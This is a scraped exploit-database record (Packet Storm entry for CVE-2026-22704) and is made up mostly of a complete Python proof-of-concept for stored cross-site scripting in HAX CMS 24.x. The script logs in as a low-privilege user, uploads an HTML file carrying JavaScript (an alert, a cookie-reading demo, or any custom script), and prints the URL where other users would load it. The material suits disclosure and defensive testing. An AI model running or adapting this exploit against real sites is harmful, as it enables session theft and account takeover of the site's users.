{“lastseen”:”2026-05-05T22:31:36″,”description”:”HAX CMS version 24.x suffers from a persistent cross site scripting vulnerability…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HAX CMS 24.x Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:220393″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-22704″],”sourceData”:”# Exploit Title: HAX CMS 24.x – Stored Cross-Site Scripting (XSS)\\n # Date: 2026-01-28\\n # Google Dork: \\”N\/A\\”\\n # Author: Mohammed Idrees Banyamer\\n # Author Country: Jordan\\n # Instagram: @banyamer_security\\n # Vendor Homepage: https:\/\/www.drupal.org\/project\/hax\\n # Software Link: https:\/\/github.com\/elmsln\/haxcms\\n # Version: \\u003c= 24.x (tested)\\n # Tested on: Linux\\n # CVE: CVE-2026-22704\\n #\\n # Description:\\n # HAX CMS allows low-privileged authenticated users to upload HTML files\\n # without proper content sanitization. Uploaded HTML files are rendered\\n # directly by the application, leading to a Stored Cross-Site Scripting (XSS)\\n # vulnerability when accessed by other users.\\n #\\n #\\n # Usage:\\n # python3 haxcms_stored_xss.py –target http:\/\/TARGET –user USER –password PASS\\n #\\n \\n \\n import argparse\\n import requests\\n from urllib.parse import urljoin\\n \\n \\n def create_poc_html(payload_type=\\”alert\\”):\\n \\”\\”\\”\\n Generate HTML PoC file.\\n Payload types:\\n – alert : simple JS alert (default)\\n – cookie : cookie access demonstration\\n – custom : user supplied JavaScript\\n \\”\\”\\”\\n \\n if payload_type == \\”cookie\\”:\\n js_payload = \\”\\”\\”\\n alert(\\”PoC: document.cookie = \\” + document.cookie);\\n \\”\\”\\”\\n elif payload_type == \\”alert\\”:\\n js_payload = \\”\\”\\”\\n alert(\\”Stored XSS PoC – CVE-2026-22704\\”);\\n \\”\\”\\”\\n else:\\n js_payload = payload_type\\n \\n return f\\”\\”\\”\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003ctitle\\u003ePoC\\u003c\/title\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003ch2\\u003eHAX CMS Stored XSS PoC\\u003c\/h2\\u003e\\n \\u003cscript\\u003e\\n {js_payload.strip()}\\n \\u003c\/script\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\”\\”\\”\\n \\n \\n def upload_file(target, username, password, filename, content):\\n session = requests.Session()\\n \\n login_url = urljoin(target, \\”\/user\/login\\”)\\n login_data = {\\n \\”name\\”: username,\\n \\”pass\\”: password,\\n \\”form_id\\”: \\”user_login_form\\”,\\n \\”op\\”: \\”Log in\\”\\n }\\n \\n print(\\”[*] Logging in…\\”)\\n r = session.post(login_url, data=login_data, allow_redirects=True)\\n \\n if \\”log out\\” not in r.text.lower():\\n print(\\”[!] Login failed\\”)\\n return False\\n \\n print(\\”[+] Login successful\\”)\\n \\n upload_url = urljoin(target, \\”\/files\/upload\\”)\\n files = {\\n \\”files[upload]\\”: (filename, content.encode(), \\”text\/html\\”)\\n }\\n \\n print(\\”[*] Uploading HTML file…\\”)\\n r = session.post(upload_url, files=files)\\n \\n if r.status_code not in (200, 201, 302):\\n print(\\”[!] Upload failed\\”)\\n return False\\n \\n file_url = urljoin(target, f\\”\/sites\/default\/files\/{filename}\\”)\\n print(\\”[+] File uploaded successfully\\”)\\n print(\\”[+] PoC URL:\\”)\\n print(file_url)\\n \\n return True\\n \\n \\n def main():\\n parser = argparse.ArgumentParser(description=\\”HAX CMS Stored XSS PoC (CVE-2026-22704)\\”)\\n parser.add_argument(\\”–target\\”, required=True, help=\\”Target base URL\\”)\\n parser.add_argument(\\”–user\\”, required=True, help=\\”Low privilege username\\”)\\n parser.add_argument(\\”–password\\”, required=True, help=\\”Password\\”)\\n parser.add_argument(\\”–payload\\”, default=\\”alert\\”,\\n choices=[\\”alert\\”, \\”cookie\\”, \\”custom\\”],\\n help=\\”PoC payload type\\”)\\n parser.add_argument(\\”–filename\\”, default=\\”poc.html\\”,\\n help=\\”Uploaded file name\\”)\\n \\n args = parser.parse_args()\\n \\n if args.payload == \\”custom\\”:\\n js = input(\\”[?] Enter custom JavaScript payload:\\\\n\\u003e \\”)\\n html = create_poc_html(js)\\n else:\\n html = create_poc_html(args.payload)\\n \\n upload_file(\\n args.target.rstrip(\\”\/\\”),\\n args.user,\\n args.password,\\n args.filename,\\n html\\n )\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220393″,”cvss”:{“score”:8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:H\/PR:L\/UI:R\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220393\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-05T22:31:36″,”description”:”HAX CMS version 24.x suffers from a persistent cross site scripting vulnerability…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HAX CMS 24.x Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:220393″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-22704″],”sourceData”:”# Exploit Title: HAX CMS 24.x – Stored…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,83,12,15,13,53,7,11,5],"class_list":["post-51608","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-80","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n